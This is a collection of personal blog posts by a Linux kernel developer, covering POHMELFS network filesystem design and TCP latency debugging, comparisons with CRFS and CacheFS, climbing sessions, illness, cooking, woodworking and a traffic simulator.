part was lots of jumps. It was not a new trace, but a special
hold on the balcony, so that it could be gotten from lower positions
with a jump. I spent more than a hour jumping from different holds
to the finish one, although did not succed in the main jumping direction.
Instead I damaged a shoulder, rubbed fingers on feet and arms, tired as
hell and got zillion units of pleasure. Also finished couple of simple
and quite complex old traces to the mix.
That was excellent time!
3 Intel E7520 systems, each one has two 3Ghz Xeon CPUs with HT enabled and EDAC bits,
4 Gb of RAM, Adaptec AIC7902 Ultra320 SCSI adapter. Disks:
FUJITSU MAU3036NC 15k rpm 32 Gb system disk (will also be used in testing), two of them
will be installed in mirror later,
SEAGATE ST3300007LC 10k rpm 300 Gb testing disk.
The former has about 90 MB/s linear read speed, the latter - 75 MB/s.
About 5 minutes to fully compile and link loadable kernel.
Pretty neat machines, and I managed to lost three system disks already, doesn't
it say about my bad carma? Without any load, without kernel changes, without anything...
Is it because they are called devfs[123] and thus striking problems
like that old virtual filesystem, which eventually died a torture death?
Waiting again... Since one machine is still alive, will start filesystem contest
tomorrow, development will be a bit postponed.
One man, 12 nights (13 days), one bottle of cuban rum and
little bits of scotch whisky, 82 'House M.D' series... feels good.
Meanwhile got three 2-way Xeon servers with 2-4 (I forgot) gigs of RAM and
gigabit link between them. Not bad for start.
Also gathered lots of power and inspiration, so, here is a plan:
second filesystem contest,
now I will test btrfs 0.13 and btrfs-unstable in addition to previous
ext[234], reiser[34], jfs and xfs running for the first prizes in
dbench,
iozone,
postmark,
maildir performance bench
and simple file creation micro-benchmark. Results will show need for the
yet another local filesystem. Making bets?
fix two problems in distributed storage:
there is a leak in mirror resync and unability to start a storage if config contains
wrong network addresses.
rewrite
core pohmelfs algorithms to make it not good, but really good. This change will
make it first against
CRFS and
CacheFS :)
POHMELFS is not where I want it to be right now.
I can not win in a fight with some issues (or better
call theirs real names: temptations), so... there is
an old method to solve this problem:
if you can not win against some temptation, just fall for it
That is what I'm doing for the last couple of days: I already
watched 2.5 seasons of "House M.D." series and expect the last
ones to complete soon...
That is why I do not write about real hacking problems I work with,
but... stay tuned, I'm just accumulating a really strong power.
# mount /dev/dvd /mnt
...^C
# dmesg | tail
[ 853.189807] sr 1:0:0:0: [sr0] Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE,SUGGEST_OK
[ 853.189822] sr 1:0:0:0: [sr0] Sense Key : Medium Error [current]
[ 853.189832] sr 1:0:0:0: [sr0] Add. Sense: No seek complete
[ 853.189843] end_request: I/O error, dev sr0, sector 9180408
[ 853.189852] Buffer I/O error on device sr0, logical block 1147551
...
# dd if=/dev/dvd of=/tmp/data bs=1M
# mount -o loop /tmp/data /mnt
# ls /mnt
Doctor House
So I can not mount dvd via mount, but can do the same after sequential
read of the dvd into the file. This error with seeking looks like problem with
hardware _or_ linux driver. I know hardware sucks, but if sequential read works
I can not understand why any other does not...
Sigh, it is 21 century on the street iirc...
Main problem is that anything other sucks even more. And everyone is guilty,
for example there is a bug in hifn 795x hardware crypto accelerator
driver I wrote, which is in the mainline, or two in
DST
project, or aywhere else. I wish world to be perfect...
I already found experimentally that write-through cache scales very badly,
even noticebly worse than without cache at all for some workloads, so an ideal
solution
does not involve any kind of write-through operations notably no synchronous commands,
which require immediate response.
This means that inode numbers will differ on client and server, so there should be
some kind of tracked dependency between them so that operations on different machines
can be done in sync. Initial though was to use binary tree to store pointers to appropriate
inodes, which would be indexed on server and clients by combination of hashes of inode (direntry)
and its parent data. Even embedded systems can easily have millions of inodes, so choice
was thought to be correct from the first point of view. Now I think different since there
is a serious problem with indexing of such a tree.
Since the only information common to both client and server is object name it should be used
as a key, maybe not name directly, but its hash, that does not matter at this point. Here comes a
problem with binary tree choice: in binary tree there is no connection between real parent in the
filesystem and parent in the binary tree, so there will be serious problems when we will put two
different object with the same name into binary tree - there will be a conflict. To solve
this problem we should use some information about where this object is placed, i.e. information
about its parent directory. Using parent name hash as a part of the key in the binary tree
does not solve problem too, since there might exist multiple directories with the same name and
the same object in it. We could solve the problem by putting into key hash of the object's name
and hash of parents key (which in turn is hash of the name and hash of its parent key), so this
recursive hashing would end up at the highest level (i.e. root directory). This works, but there
might be scalability problem with the following issues:
server has to either cache opened directories or reopen it one-by-one when accessing an object
when object is moved/renamed all keys of its children and parent has to be changed
which is unacceptible. So new solution was thought of.
So far I have two ideas:
kind of radix tree
multi-layer hash tables indexed by double name hash
While the former is kind of obvious, the latter is quite interesting but very simple idea. Consider
that each directory has a hash table of its children, it is indexed by double hash of child's name.
We need double hash to remove possibility of collision (I can not prove mathematically (maybe only yet)
that there are two hashes which will not allow simultaneous collision in both, but feel quite strongly
that such hash pairs exist) and to use them in network commands. Commands can be optimised either
to use full path if it is short enough (just sent a path string during writeback or readpage as a
path to where data belongs) or use an array of hashes of the path elements instead of '/' separated
names. Hash tables actually have to be changed to different data structure capable of hosting not only
small hash values, but full 32 or 64 bit hashes. It can be a binary tree or judy array, something similar
to what was used in
unified socket storage. The former looks a bit excessive.
Using such approach it is possible to lookup an object with O(k) operations where 'k' is number of directories
in a path, very usually it is smaller than 10, which for binary tree corresponds to as much as 1024 inodes,
which is too small for the real system.
This approach (especially when full path is being sent) allows to eliminate mentioned above scalability problems.
Implementation start is scheduled for today, but I have to think about details first.
That was quite for a while that I did not climb, so today I've reopened
a season. It was surprisingly good training, although I did not that much,
but only couple of warming traverses and three new traces, which I tried before
though. One of them was noticebly complex, but extremely interesting.
For those who visit Skala-city
it is trace over yellow holds in the right corner with 6c+ category.
Complex, and I did not even expect to complete it without falls, but
everything was better than expected - of course I fell, but eventually completed.
At the I moved to the sauna and shower. Excellent finish of the day!
I like it.
Zach Brown has
announced
CRFS source code openess.
CRFS is a network filesystem which works
with remote BTRFS volume and supports
cache on clients.
Here is a brief set of features CRFS supports:
the user space server exports a private BTRFS volume
the network protocol operates on ranges of BTRFS disk items
the kernel client provides posix semantics by operating on items
the server can grant and revoke client caches of data and metadata
CRFS protocol is very tied to how BTRFS is organized. For example there is natural
batching of some commads like the recursive delete commands, since btrfs keys
placed one-by-one, so there is no need for additional command to be sent, instead
the first one can be extended to cover wider key range.
As you might notice pohmelfs
was started as a competitor to crfs project, because the latter is interesting and was closed. Right
now pohmelfs has set of very interesting features crfs does not and likely will not support (like offline
working, different server filesystem support), also its todo list has plenty of very interesting
stuff, so it will not be closed. Instead I plan to proceed the competition (which is a bit
complex for me, since it is first filesystem I write and essentially I did not know what inode
before) and fully complete pohmelfs. Although I subscribed to crfs-devel :)
My new shiny servers will be installed today, so tomorrow I will start (re)implementation of
the ground ideas of
pohmelfs.
No, its not yoga, I talked with people who did it regulary... It is not talks
with trolls, they are harmless. Trying to understand VFS or ext3, which sources
are encrypted in linux tarball, is interesting. Playing chess and 'go'
is just a warming.
Real patience is checked when you are cooking a ravioli.
That is how I spent a monday:
half of a hour to make a pastry
half of a hour to cook up a minced meat
about 10-15 minutes to roll up small piece of pastry to thin circle
about 20-30 minutes to make 10 raviolis
So, to make above set of them took as long as 3 hours, so not that much.
That was a theory, in practice pastry for each third or forth 'blank' wanted to run away
and pastry did not allowed to 'glue' its parts together, which took 5-10 minutes
for each one to 'fix'. In some cases it ended up with smaller examples of 'Resident Evil'
creatures, like which you can find at the right part of the above picture.
Looks good? And really tasty.
So, forget yoga and chess - real patience is trained
by cooking.
There are two ways to point to mistakes made by others:
tell them "hey, you have an error :)" and "you have error here and there".
This can be ended up with
"yeah, that's a good fix" and "you do not know the things, stops doing this things".
It looks like there is no difference in the first messages, but results
will be very contrast. If you do not care
about communication with the person who made a mistake, but only cares
about things got fixed, there is no difference on how to point to the error,
but be ready (although you do not care) that person will reply to you
quite aggressively and can resist to make a solution if it is not vital
for the things being discussed. It is of course wrong and kind of childish,
but that is how people very frequently reply. If you care about communication
with the person in question, then speak like you want to be spoken back.
It is not very simple actually, but do not expect an easy solution with
teaching tone.
This reminds me how kernel maintainers reply to people who make some contribution.
There are very good people who start a discussion friendly even if patch
or question is really wrong, this can end up with sending to mail archive or faq.
There are persons (we all know who) which only replies: this is wrong,
you have a race. Sometimes a race places can be pointed.
So, be cool with others and do not pretent to be the smartest one.
That of course touches me too... I'm frequently a hard one to talk with.
I believe that photographers which only make black and white photos
are not as good as those who do not fear to make coloured photos.
BW ones almost every time are good, while coloured are usually not that
interesting, and changing them to BW frequently fixes the shot.
I am antisocial. Not always, but frequently. And never in a good known company.
Got a number of whiskey drops (solely for cure purpose) and made this creature.
So, last several days devoted mostly to thinking about the things and some
experiments with them lead me to the headline conclusion: pohmelfs was done
just wrong!
Its network ping-pong protocol is wrong, its inode resync logic and overall
need for inode number change is wrong, its writeback logic is wrong (btw, why
Linux VFS calls writeback for inode after it calls writeback for inode's pages?
This leads to the inode number resync code duplication and fair number of problems),
its userspace server cache is wrong (well, its userspace server is a braindamage,
but that does not prevent it from being wrong too), and the most important: it becomes complex,
so I frequently have to read my own code multiple times to understand what I meant here or
there.
That just has to be changed (mostly just removed)!
Thinking about all that crap lead me to the more phylosophical conclusion: any network
protocol which requires precise acknowledge for a packet is broken. Point.
TCP is not broken, since it can send acks for multiple packets. TCP can aggregate on both
sides of the connection (which can lead to the huge
performance increase
as was observed in userspace network
stack over netchannels),
so it is a stream, not a ping-pong, although its policy for ack generation is not always the best decision.
Out of curiosity, why original ping and traceroute commands were not implemented as TCP applications
which would catch ack/rst packets?
So, anything ping-pong like is just broken. Never ever use that logic at all, since it breaks performance
and ability to extend. More to the game, it breaks ability to create real duplex communication,
since while you expect an ack you can get data from the other peer for different command.
So, brilliant idea (yes, I sometimes get them from the deep abyss of the mindless) is to convert POHMELFS
protocol into two real streams: from clinet to server and completely independent stream from server to client.
It has zillions of benefits, but lets see how it is going to be implemented and what will be fully broken in the fileystem.
First, there will not be resync logic. At all. Each inode (and its number) on the client will not correspond
to any inode object on the server, so local inodes will never be synced with the server one. Instead cache of the objects
on the server side will be indexed by special keys containing name, length and other parameters needed for unique number generation.
Client inode number will never be sent to the server, so object creation will have only single direction: just send a packet.
If there is unrecoverable error, connection can be broken, so subsequent command sending would reconnect or make some
changes. Things like permissions will be guarded by the client, there might be no space problem though.
Second, commands, which require feedback from the server, like reading directory content will become completely
asynchronous, so feedback from the server will not be exactly a sync reply for given command, instead
we can wait until directory content was populated and start providing it back to VFS.
Third, and the main, there is a possibility for the stream commands both from client and server. Since clients
now do not require sync ack/reply, they can be batched to the maximum performance, but that is not a main feature,
really interesting is ability to receive a stream of commands from the server, so each ot them can be parsed
independently from the original client command state. This allows to implement cache coherency protocol without major
pain and have a high perfomance stream of data from server to client.
More to the game is ->sendpage()/sendfile(), which are
broken
without proper acknowledge, so to fix the issue I plan to submit a socket extension patch, which will call
appropriate registered callback when page reference counter is about to be dropped, which automatically means
data was received on the remote side. This kind of acknowledge does not break connection down more than
simple unidirectional bulk transfer, so it is fast.
So, started deleting lots of code and implement needed bits, the nearest future will show how broken my approach is.
This rises a question about design vs. evolution... I actually prefer the former, but frequently end up with the
latter (like this decision about network protocol, which is a design, but only after several evolution steps
in wrong direction). This reminds me kernel evolution
topic, which does not actually show anything good for the kernel: there are lots of dead-end evolutional branches which
believe they are the top of the progress, maybe mankind is one of them...
That was a lyrical digression, so back to business!
All operations in pohmelfs
are made locally and are populated back to the server during writeback time (or via cache coherency
algorithm, which is not implemented fully yet). POHMELFS uses
writeback cache in all its power, which allows to remove directory of arbitrary size
using only single network command.
During unlink/rmdir time local object is removed and potentially destroyed, while short reference
of what it was is stored in a sync list of the parent, which is marked as dirty. So, when writeback
hits parent directory of the just removed object, it sends all information of the removed objects to the server.
So, when directory with arbitrary number
of subdirs and other objects is recursively removed locally, information is not sent, but added to appropriate
parent subdirs, which are removed in own turn, so when the whole subdir is removed, only single object
becomes dirty - parent of the just-removed directory, which contains information of the removed
dir. Message about this will be sent later (on writeback or because cache coherency protocol), which will
force server to remove the whole subdir recursively. This is much faster than sending information about
every single object being removed during recursive removal of the directory.
Of course if writeback starts hitting pohmelfs inodes during deletion time it is possible that not only
information about the highest removed directory will be sent, but also about some underlying subdirs, but
that does not matter a lot, since this is a very short condition (inode is in dirty list and yet not removed
by the recursive removal) and number of such inodes is still much smaller compared to overall number of removed
objects.
Actually cache coherency algorithm is the last serious thing to implement in pohmelfs I think. There are bugs
of course and some feature extensions, but major milestone will be set after this got implemented.
Stay tuned!
We had a small chillout in 'The last drop' and at home later (and earlier, since celebration
bagan right at 00:00, although Wijo said he was born at 10:00, that did not matter already).
Besides other interesting presents,
he got a bottle of Hennesy XO (yes, I was lazy enough and presented that simple stuff).
So had a chance to compare (before it was quickly finished) it with other cognacs
I drunk before. Well, my opinion about cognac being untasty coloured vodka was confirmed again.
IMHO Hennesy XO, VS and VSOP (Very Special Oshe Pizdets) all are not that interesting drinks,
as long as other cognacs I had. Next time
I will try Remi Martin, but think that it will be similar. Yep, I'm not a fan, but rum-m-m-m...
If something looks undebuggable from the first view, than take a secon one.
Better from different angle. Some problems require third look.
Bits of history of the problem.
Pohmelfs
has extremely large latencies
when syncing local inode to the remote server. This involves sending
a command to the server to create an object with given name and receive back
a response with its real inode information (like inode number and other
fields cached for faster stat() and similar workloads). Pohmelfs
then changes local inode info to match the real data.
Syncing of small tree of 500 files takes about 40 (!) seconds. Well, in Xen
environment where I develop this things local creation of 500 files in single
ext3 directory takes more than 15 seconds, but another 25 is a pure overhead.
That was short description of previous series.
Next, problems of fixing the problems.
First, Xen version used at that testing machine is old enough, so oprofile
does not work. Second, I do not know VFS internals enough (this is my first filesystem,
interested reader can find how I managed to
step
likely on every possible rakes
on that field, some of them were even small kid rakes...) to determine where there
is a possibility to catch that long delays, but since linux filesystem is actually a
not that complex system, but set of callbacks, implementation is not really outstanding,
but knowing in which condition each callback can be invoked and which problems can be
here or there is kind of a magic... Third, remote userspace pohmelfs server was not actually
written by me, instead its bytecode was blown out because of some substances inspiration,
so it can be very much a reason for all the problems, given that it is trivial as
pretty much all my userspace code, even total rewrite will not fix the issue.
So, latency problem in pohmelfs looked really undebuggable. But you know, cup of excellent
tea (from tea-packet) with lemon can fix any problem (or high themperature and substances,
or fair amount of alcohol, everyone has fun the way he likes), so it was first
decided to implement
a simple network kernel module which would connect to remote userspace server and exchange
messages in a similar fasion like pohmelfs does.
Such module was implemented, started and showed excellent performance (about 1 thousand of messages
per second send and received back in test network, which is several orders of magnitude faster
than pohmelfs). So, move back to VFS and pray for inspiration.
Inspiration was met today (thanks Arnaldo, likely it is because I'm getting healthier :).
I always thought that number of subsequent calls for recv() is not a good idea no matter
where: in kernel or userspace, since it takes a socket lock, which in turn can introduce latencies found,
so I eliminated subsequent recvs in pohmelfs code (testing module was written better and does
sending and receiving without such 'fragments'), which resulted in... nothing, results did not changed
at all. So, wrong step, but having subsequent sending calls in a row is not a good idea too,
so I replaced them with allocation and copy, so that there would be only single kernel_sendmsg()
call. As you might expect performance... changed by 30 times. Just by having single send call instead of two
for as much as 500 invokations forced the whole network exchange to behave completely different.
So, to debug problem further I extended testing module and introduced ability to send and receive
data not by single packet but via two fragments: 4 bytes and rest of the packet (60 bytes). Here is a result
table for 1000 of messages sent and received back by testing module:
no fragments: 1.43 seconds
send fragments (4 and 60 bytes): 40.43 seconds
recv fragments (4 and 60 bytes): 1.43 seconds
both fragmentations: 40.43 seconds
It is 30 times difference just for simple application change! tcpdump on receiving side shows that subsequent fragments sending results in a real message sending
all the time kernel_sendmsg() is invoked, which results on ack for each such message (both 4 and 60
bytes), which completely degrades tcp window and connection just can not recover with such behaviour.
So, all that words were written just to show that even undebuggable from the first view problems can be easily
solved, and that harmless (from the first view again) programming mistakes can result in very interesting results...
Now back to drawing board to think how to improve pohmelfs protocol even more to get the last bits out of the wire.
Btw, interested reader can get my network testing module and userspace from theirs
just created homepage.
I can not make a photo of the workplace, where wood plates are placed
because of the ever crappiest repair service of Nikon, so enjoy that
pseudo-grahics instead :)
Originally it was supposed to host not only bottles of wine (I do not
drink wine though), beer and strong alcohol, but also some books,
but I made a mistake in the design which was further increased when
plates were sawn by the people (well, I gained a huge experience of not
letting others do the thing I can do better, even if I pay them for that),
so cells became smaller (it now can host only about 5-6 classical
(0.5l) bottles of beer, each side of the square is about 17 sm)
and have cut side. Both this issues forced me
to rething design a little bit, so now shelves reduced its functionality,
but looks probably even more interesting than in original design.
So far I did not finished wood polishing and did not start its mordanting
and plastering, but only contructed the whole structure on the floor,
so it will take a while to finish, but result is expected to worth all
the eforts.
One told me that there is something similar in Ikea, well, there is always
something similar in Ikea no matter what you created or only thought
about, but that completely does not matter - only process of creation
matters and that is the most interesting and important.
Trying to make at least something during fscking sick.
I've create a simple traffic simulator, which contains variable number
of cars and lights, each of which can be programmed to different acceleration,
maximum allowed speed, stop and deceleration distances. Each light can be
programmed to switch lights after different interval, there are only two lights
in real life: red and green, at least in Moscow very unfortunately) no one
ever cares about yellow, lots of drivers specially accelerate when see yellow...
So, only two colors.
Since I did not bother to implement a nice config for each car and light,
there is only signle set of parameters, but command line parameters allow
to vary initial number of cars and distance between them, number of time frames before
lights change the state or new car enters the road, number of lights
and distance between them.
There are two known problems with the lights on the road: first, bad drivers,
who do not maintain a huge enough buffer, so they have to wait until car
in from of them moves far enough so they can start, this takes some time
from limited timeframe of the green light. If buffer is large enough, drivers
can start simultaneously and thus move much faster.
One can simulate
this behaviour with variable initial number of cars and with different distances between
them, if distance is less than stop distance (i.e. distance where driver has to
stop its car, it is 4 in the current setup), then driver will have to wait,
until distance becomes more or equal to stop distance, if driver stopped far than
stop distance (let say 5 'meters'), then car can start simultaneously with the head. The latter
approach allows to move more cars through the light during fixed time frame,
but psychologically it looks better to stay as closer as possible to the head
car, which introduces a latency, since we have to wait until head car moves far enough,
so we could start. This leads to negative exponential speed increase for each car
behind instead of linear speed if drivers would maintain the buffer. Appropriate
equations are quite simple: difference of the distance moved by the single
time frame is proportional to the acceleration of the head car, which in turn
is proportional to its coordinate, so we have a simple differential equation,
which solution results in a negative exponential. One can read a bit more
here.
Second problem is light interval. If interval is too short, then cars can not start,
only couple of them moves forward, and if it is big enough, then during red light
a large backlog of cars can be accumulated, and it will not be removed during green light
because of the above problem: each car has to wait until head one moves to some distance.
The latter is actually worse, since backlog can become so huge, that it will not be removed
at all, which will lead to complete stall of the traffic flow (at the back side, front one will
move, but number of cars at the tail will be bigger than number of cars which leave the
traffic jam).
One can play with the programm, called
traffic.
It requires gtk2 devel package installed. Homepage contains essentially the same text
and link to the source code.
It also shows usage example.
David Howells of RedHat recently
posted
next round of his CacheFS implementation. Main idea of the project is to
store locally data and metadata modification on disk.
Cache is implemented as write-through one. Locally data is stored as
usual files on a special partition formatted as one or another filesystem.
David also posted
benchmarks
of his apporach. Metadata intensive operations showed significant slowdown
with the local on-disk cache, getting metadata from local cache also shows
a slowdown. The former can be explained by the write-through nature of the cache
and slow local disk operations, which is also a reason for metadata reading
downgrade of the speed.
There is also no cache-coherency algorithm implemented for CacheFS. Another problem,
pointed also by Kevin Coffman is possible slower reading of data from the cache than
from the local filesystem (and from remote one if bandwith is not a limiting
factor which is frequently the case).
This is third (actually the first :) local cache implementation for the network
filesystem, so competition between
CRFS,
POHMELFS and
CACHEFS becomes even
more interesting :)
Stay tuned!
As was mentioned full inode resync logic
is very slow.
Latency is introduced likely somewhere at protocol layer, which is used
by pohmelfs. To test this scenario and find out the best possible
solution I implemented trivial network module and userspace server, which
talk to each other via protocol very similar to what is used in lookup/create
operations in pohmelfs. Server and client also maintain trees of the objects
it sent/received, so that model would be as much as possible similar to
pohmelfs usage patterns.
Its time to test things and find out where the problem lies, but as usual
there are problems. You are sick, everything is aching, but you
want to beat the crap, to move a bit further, to make something
interesting, so you start implementing the tiny bits, you start thinking,
you finally make the things, so you become happy and proud, and that is
just to find out, that all testing machines you had access previously
are turned off, and new ones are behind a firewall and there is no access
to the network from the ass of the world. This is called 'shit happens'.
At least yum developers do not know, that there are systems
with less than 1 Gb of RAM. And it is not even about how slow yum
is. Not about the fact, that to install 30 kb application yum will
download 3.5 Mb sqlite database file.
It is about yum programming bugs:
As you might expect, all 70+ packages above also got 'Cannot allocate memory'
error. My laptop has 256 Mb of RAM and 512 Mb of swap, more than a half was free.
After trying to start the same process again, after some applications were killed to get
free memory, yum refused to install packages because of broken
dependencies...
But libebml has one FC6 version. For the protocol, FC6 was never
installed on this laptop:
libebml-0.7.7-2.fc6
libebml-0.7.7-3.fc8
Fedora Core also forces FC9 stopper bug into needinfo one without any single
patch/version to test (at least I did not receive any such mail),
opened with perfect description, with probability of bufer overflow
somewhere in image processing/rendering code, with 100% reproducible example and image
to test with, even after other person reported the same problem on rawhide
(and marked it as fc9 stopper).
How in the hell you expect to get some info after two months of silence from developers?
(one month after bug was confirmed in rawhide)
Some people still believe in miracles...
I would like to test it right now, but I can not because of yum problems...
Old packages, as you might expect, still have that bug somewhere.
World is far from being perfect :)
I will not turn it off or suspend, I do not believe it will work after that. Instead
I will wait until capabale to get new DVD with some other distro. And it
willnotbe
Debian either.
I first time in my life called a doctor.
Doctor happend to be a nice-looking woman less than 30 years old
we nicely talked about my sickness, and how (un)successfull cure was.
Since it is first time I used some drugs (except aspirine) to cure
(I belive it is a flu) the sick, I managed to miss the point, when getting the drug
should be started, so it was not very useful. After the quick look at me
she found so many possible crappies I would have, so I began to scary.
I always knew that the less one knows the better sleep is, but after
set of questions and 'no, I do not' answers, sky became a bit less cloudy...
She gave me a list of needed drugs to get, described what the heck
it is (flu, which forced some complications: something like
bronchitis), so now I feel a bit better, but will be ill (according
to her prognosis) at least all this week or maybe a bit more.
Modulo themperature I feel not that bad, but when it starts rising
after drug (aspirin) stops working, I start feeling like shit, dejavu.
I actually tried two anti-themperature drugs: aspirine and paracetamol.
The former kicks the themperature in about 30 minutes, but frequently
this results in excessive hyperhidrosis, while the latter acts only in an hour
or so, but without any bad effects.
So, as you might notice, there are no updates about tons of my
projects
because of this fucking sick, but I expect soon to be able to kick
its ass so things would be in a good shape again.
Such (crappily forced) 'vacations' make brain to sleep allmost all the time,
so when this will be ended, I expect even higher rates and more
interesting stuff happens.
Let's suppose one does not have a thermometer, but there are lots
of instruments and equipment around starting from screwdriver to drills, from simple
amper/voltmeter to laptop. As a prompting: there is also electricity,
vater and automatic teakettle.
Task is to measure temperature of the own body and decide to get or not
to get an aspirin. Or make some fun from the process because of quite boring
sickness.
Solution is pretty geeky, but first try to think about it yourself.
So, the solution.
It is based on the fact, that when human body or part of it is placed
into environment with essentially the same temperature, but much
bigger thermal capacity, it does not feel this.
Try get shower with about 36 degress Centigrade, and you will not feel neither
cold, nor hot. Things are different when air on the street is more than 30 degrees
Centigrade, that is because of too much different thermal
capacity of water (it is huge) and air (very small).
So, back to the task. To determine your tempeperature you have to get precise
volume of water in the teakettle (let's say 1 liter, I could measure it because
I have water counters), connect teakettle to the electricity via ampermeter, measure
voltage by voltmeter.
Then you have to put your arm into the teakettle and turn it on (beware of heating
element) and checkout first time. When your hand will feel itself very comfortable
(here is a main error factor) you have to checkout second time. Then remove your arm
and wait until water become boiled and write third time.
Now, its time for school physics: power of the teakettle, which is equal
to multiplication of current strength and voltage, multipled by
time difference is equal to weight of the water multipled by its thermal capacity
and temperature difference, which was changed during above time frame.
So, here are practical results:
current strength I = 3.7 A
voltage V = 231 V
mass of the water m = 1 kg
thermal capacity of the water c = 4200 J/(kg*degree)
time difference for complete boiling (from unknown temperature to 100 degrees Centigrade)
dt0 = 420 seconds
temperature difference dT can be found from following equation:
I*V*dt0 = m*c*dT
So, we have dT = 100 (temperature of the boiling) - T0 (initial temperature
of the water) = I*V*dt0/(m*c), and is equal to 85 degress Centigrade, so initial
temperature of the water was about 15 degress Centigrade.
Time difference between start of the process and comfortable temperature
was about 30 seconds, so placing this timeframe into above equation we can find,
that temperature was changed by 6 degress.
Since we already found, that initial temperature was about 15 degress Centigrade,
calculated temperature of my body is about 21 degrees Centigrade.
Its time to go back to grave...
P.S. Yes, I'm a former looser-physicist, that's why I became a kernel hacker, this can
explain alot...
Here are number of interesting moments in this miserable
melodrama
(got via Linux Today News).
Stallman wanted to visit Russia this March, and parliament member Viktor Alksnis
promoted his visit and wanted to help with 'administration issues'.
Then LOR (www.linux.org.ru, one of the most popular linux sites
in Russia) moderator Sergey Udaltsov (who lives in Ireland)
sent a letter to Richard, where
pointed that Alksnis is not a good man, he also noted about Alksnis'
"fight against the independence of the Baltic countries" in late 80s.
Stallman then said that he does not want Alksnis to organize his visit.
Well, my couple of points about this stupid situation.
First, Alksnis is really not a very smart person in IT, and it looks
very much like he is a usual careerist, since I do not know about his
work at all except stupid idea of creation of 'national OS',
probably using 'nanotechnologies' (it is a modern trend here :).
Second, step of Sergey Udaltsov is very well braindamaged - while it is ok to
describe who Alksnis is, but pointing to Baltic independence is even
more stupid than 'national os' idea.
So, my simple point is that both Viktor Alksnis and Sergey Udaltsov just
wanted to make some self-advertisement profit from Rishcard Stallman's visit
and do not really do it because of open source. Although
self-advertisement is not a bad idea (you read this blog :), such movements
are stupid.
If Stallman got problems with visa (I'm surprised if it takes more than two weeks),
then it means he does not really want to
visit Russia, for example I got kernel summit invitation more than two month
ahead of the meeting, which was enough to get visa (it required two (!) visits
to the UK visa office just to give and get back documents,
it took two (!) days to check documents, and it was
possible to order a courier,
although previous year time frame was shorter). If he does not want,
why would we care?
If someone wants to visit a country, he can find a way to do that himeself
and do not wash own brain with stupid rethorics.
I think it will be a cause for Richard not to visit, since it really
looks like he does not want to do it :)
Well, when you are sick it is generally not a very good idea
to work on something, but this state can produce very interesting
ideas. So, I decided to change my table,
so I 'disconnected' a leg (there is only one, other side is connected to the wall near the window),
removed all varnish layers using a plane, polished
a bit by grinding machine and painted both sides of the table
with new dark chocolate colour. Looks pretty good, but since orgalite,
used on both sides, is made out of wood fibers, it is not 100% smooth,
although second layer of the colur is a mandatory, it is possible,
that it will not be enough. I want if not completely smooth surface,
but at least that hand moved on top of it would eel nothing. Managed
to paint hands and feet, but at least hair was not touched (although
I'm not sure).
Also installed number of electricity sockets, so there is no need to place kettle
far from the 'bed' (i.e. part of the floor).
Overall it was a good development day, I expect next one to be as much
as productive if not more. Nevertheless I hate to be sick...
It also works with much bigger trees (like untarring linux kernel tree,
although ugliness of userspace server requires to rise maximum amount of opened
file descriptors).
There is a single problem in this case: it is damn slow. And I do not see
an easy explaination for that. Well, tcpdump shows small window, but that is an end result
I think, not a reason, and the reason is likely in the protocol pohmelfs uses - system sends
number of short packets in round-robin fashion, which may be slow for some reason.
Since I'm waiting for real hardware to test things on (since oprofile does not work on installed
Xen version), I can only handwave about the root of the problem...
And that is exactly the same problem which was with write-through cache pohmelfs had first, I think
even timings are similar, so after this problem is fixed, new version will be released.
There is another problem, which complicates the development - I got a cold (second one this year, and third
one for the last 3 or 4 years though), but such condition with some temperature, when brain is in the
'hinged' state between sick and good shape, opens very fun feelings about things around, which usually
ends up with very interesting results.
But overall it does not work, since writeback can happen for any inode
inside the whole not-synced tree, so trying to sync inode number for some
obscure object, which sits in the directory server never saw before, is quite
problematic - the whole tree has to be traversed from the inode under writeback
up to the one which is known for the server host.
Although this is not a very complex task, but there is a question about what to
sync. Should the whole directory content be synced, or just single inode,
if the former, than should we force writeback for other objects in the directory under
resync... I think the simplest case is to force only higher layer object creations,
not syncing theirs content (like other objects in the directory), but directory itself
should be marked as dirty, so that access from different clients forced appropriate
resynchronization.
That was bloody excellent training, but since it was only third
one this year, I hardly can find a piece of body which is not aching right
now. Maybe ears though...
I started to climb high without usual warming traverses today, so knees were
damaged first (not counting couple of strikes by the wall and holds). Then
fair number of various attempts to finish new (quite complex though) trace
over blue holds in the right central section, which moves over the new
balcony in that area. Eventually I found the solution (although I think there
is another one, which requires a bit more power, but a bit less technique),
but damaged arms, rubbed all 20 fingers, and made arms very tired. Also tried
some interesting old traces, but since I tried them only second time, I failed.
That was ok, legs and back were not aching that time, but then I found a trace,
which made the day! Excellent complex and quite short trace in the right
vertical corner of the climbing area.
Trace requires very interesting technique almost without heavy powerlifting
movements, but good balance and stretching.
I spent more than a half of a hour there, damaged shoulders and fingers,
stretched everything which was not broken before, but completed the trace
(although only piece-by-piece, will finish it cleanly next time), and finally
moved to the shower (even sauna did not work today) as a number of separate pieces
of crap connected to each other essentially by virtue of the mind.
Excellent day, excellent time!
It is rather dumb and even does not have state machine handling
in the usual meaning.
Existing pohmelfs implementation has only two places where content of the inode
is 'globaly' modified, by 'gloabaly' I mean some changes, which have to be seen
by other clients if they will access given inode.
First one is directory reading, when inode in question gets information about
other inodes in given one, another one is object creation. Object removal is local
operation, and there are no collisions if multiple clients delete the same object
simultaneously.
When directory is being read first time, pohmelfs just syncs its content from the server,
all subsequent reads happen from cache, since all creations and removals happen locally.
This case is simple.
When pohmelfs is about to create an object, it marks parent inode as dirty,
if parent inode was not marked dirty previously, this ends up sending a single
message to the server. Server in turn can return content of the directory in question,
if that inode was already modified by different client. If there are objects with the same
name as local ones, local objects are 'renamed' to the 'oldname-synctime', so that
user could later run diff or whatever and merge changes. That is how offline
pohmelfs clients work.
Object is always created in the local cache only with local inode number. So far
it is never being sent to server (although code which does it and changes the inode
content exists), even writeback does not work right now (since server does not know
about object with local inode numbers). This part is a bit more complex: pohmelfs
has to sync inode (i.e. to send current inode info, wait until server creates object,
then receive real inode info and change local cache) either in writeback (when
system forces to writeback a page(s), appropriate inode will be synced first)
or in cache coherency algo. For that purpose each network state locking first checks if there
are messages in the queue from the server, which have to be processed first,
so far only server content receiving is supported, forcing to send own content on request
from server is a base of the cache coherency nad this is not yet turned on. Here
major race lives, which can lead to the full resync of the idea actually. After we locked
own network state and checked that there are no requests from the server, client can start
sending own commands, but before they came to the server, it can start CC resync
(and send messages into the same pipe as clients command) initiated
by different client, which will break protocol state machine. This is main idea to think about.
Oh, and to implement the same logic on server :)
